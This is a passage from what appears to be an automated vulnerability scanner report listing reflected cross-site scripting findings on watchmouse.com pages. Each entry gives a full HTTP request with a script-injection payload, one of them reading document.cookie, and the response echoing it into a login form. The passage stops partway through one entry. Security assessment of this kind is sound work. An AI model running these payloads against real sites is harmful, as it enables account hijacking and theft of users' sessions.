Host:   http://www.watchmouse.com
Path:   /es/learn_more.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abf65"><script>alert(1)</script>5359773e6f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/learn_more.php?abf65"><script>alert(1)</script>5359773e6f4=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:08:54 GMT
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/learn_more.php?abf65"><script>alert(1)</script>5359773e6f4=1" method="post">
...[SNIP]...

1.254. http://www.watchmouse.com/es/plans_price.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/plans_price.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8edef"><script>alert(1)</script>9db211844e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es8edef"><script>alert(1)</script>9db211844e/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2580612c6e889abb55a01fc21fecea09"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es8edef"><script>alert(1)</script>9db211844e/plans_price.php" method="post">
...[SNIP]...

1.255. http://www.watchmouse.com/es/plans_price.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/plans_price.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2e5"><script>alert(1)</script>97edefa43b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/plans_price.php6d2e5"><script>alert(1)</script>97edefa43b4 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-d234e6ed6a2ad07e92cd8e1715169d79"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/plans_price.php6d2e5"><script>alert(1)</script>97edefa43b4" method="post">
...[SNIP]...

1.256. http://www.watchmouse.com/es/plans_price.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/plans_price.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb924"><script>alert(1)</script>4b3757cb1f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/plans_price.php?bb924"><script>alert(1)</script>4b3757cb1f1=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-79395280ffffee6a97dd2ba266ccc758"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/plans_price.php?bb924"><script>alert(1)</script>4b3757cb1f1=1" method="post">
...[SNIP]...

1.257. http://www.watchmouse.com/es/register.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/register.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de7dc"><script>alert(1)</script>a702ee620f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /esde7dc"><script>alert(1)</script>a702ee620f3/register.php?vpackid=35 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-42644a2ca5d6ace08721d5d686ce09c8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/esde7dc"><script>alert(1)</script>a702ee620f3/register.php?vpackid=35" method="post">
...[SNIP]...

1.258. http://www.watchmouse.com/es/register.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/register.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cb77"><script>alert(1)</script>00443087748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/register.php6cb77"><script>alert(1)</script>00443087748?vpackid=35 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:08 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-7519ae4f658868d82a56586a01dbb461"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/register.php6cb77"><script>alert(1)</script>00443087748?vpackid=35" method="post">
...[SNIP]...

1.259. http://www.watchmouse.com/es/register.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/register.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20379"><script>alert(1)</script>0895f9d3261 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/register.php?vpackid=35&20379"><script>alert(1)</script>0895f9d3261=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-2dbb4e7ceb63b6b2c81b1d40aed9e263"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<a href="/en/register.php?vpackid=35&20379"><script>alert(1)</script>0895f9d3261=1" onclick="$('#lang-menu').toggle();">
...[SNIP]...

1.260. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ccdc"><script>alert(1)</script>576dd2045f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feature2ccdc"><script>alert(1)</script>576dd2045f7/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:53 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-32e33a90a1a6fdeeaf0416628ff582c4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature2ccdc"><script>alert(1)</script>576dd2045f7/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.261. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e30dc"><script>alert(1)</script>03aba4d349e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feature/transaction-monitoring-web-application-testing.htmle30dc"><script>alert(1)</script>03aba4d349e HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ef9af357f4d182aa92581ee822f6c19f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/transaction-monitoring-web-application-testing.htmle30dc"><script>alert(1)</script>03aba4d349e" method="post">
...[SNIP]...

1.262. http://www.watchmouse.com/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef042"><script>alert(1)</script>f5b11d50e0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feature/transaction-monitoring-web-application-testing.html?ef042"><script>alert(1)</script>f5b11d50e0c=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-fb563c6017d0cf55bf1d5e82cc6e39e1"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/transaction-monitoring-web-application-testing.html?ef042"><script>alert(1)</script>f5b11d50e0c=1" method="post">
...[SNIP]...

1.263. http://www.watchmouse.com/feed.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /feed.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c5d"><script>alert(1)</script>60e3686757d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feed.php51c5d"><script>alert(1)</script>60e3686757d HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:10:20 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f61413f7ac2a91e95cd03c5d2fe0ecde"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feed.php51c5d"><script>alert(1)</script>60e3686757d" method="post">
...[SNIP]...

1.264. http://www.watchmouse.com/feed.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.watchmouse.com
Path:   /feed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 687b1<a>2e82533c893 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /feed.php/687b1<a>2e82533c893 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:10:18 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-837ad2275372175bc5a833af2988f681"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=utf-8
Content-Length: 22323

<?xml version="1.0" encoding="utf-8"?>
<!-- RSS generated by WatchMouse script -->
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<title>WatchMouse website moni
...[SNIP]...
<generator>/feed.php/687b1<a>2e82533c893</generator>
...[SNIP]...

1.265. http://www.watchmouse.com/fr/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6419d"><script>alert(1)</script>def6dce2293 was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=16419d"><script>alert(1)</script>def6dce2293 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-ddd74b2b05d8c6f3b0cb8917517dbe23"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=16419d"><script>alert(1)</script>def6dce2293" method="post">
...[SNIP]...

1.266. http://www.watchmouse.com/fr/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1291"><script>alert(1)</script>630ae9a337e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

